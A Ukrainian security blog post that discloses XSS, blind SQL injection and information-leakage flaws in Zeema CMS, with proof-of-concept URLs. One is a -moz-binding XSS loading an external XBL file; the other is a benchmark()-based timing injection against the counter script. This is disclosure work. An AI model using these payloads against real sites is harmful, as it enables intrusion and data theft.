Websecurity - Веб безпека

27.10.2011

У вересні, 12.09.2011, під час аудиту сайта свого клієнта, я знайшов Cross-Site Scripting, SQL Injection та Information Leakage уразливості в Zeema CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Zeema CMS. Це друга частина з великої кількості уразливостей знайдених в даній CMS. Про інші дірки я розповім згодом. Всім користувачам даної системи вельми рекомендується провести аудит безпеки власних сайтів.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

07.12.2011

Cross-Site Scripting:

http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E

Атака спрацює в браузерах Mozilla і Firefox.

SQL Injection:

http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23

Це blind SQL Injection.

Information Leakage:

Статистика сайта http://site/counter/ знаходиться в публічному доступі (і шлях до неї легко дізнатися).

Уразливі всі версії Zeema CMS.

This entry was posted on 17:28 07.12.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.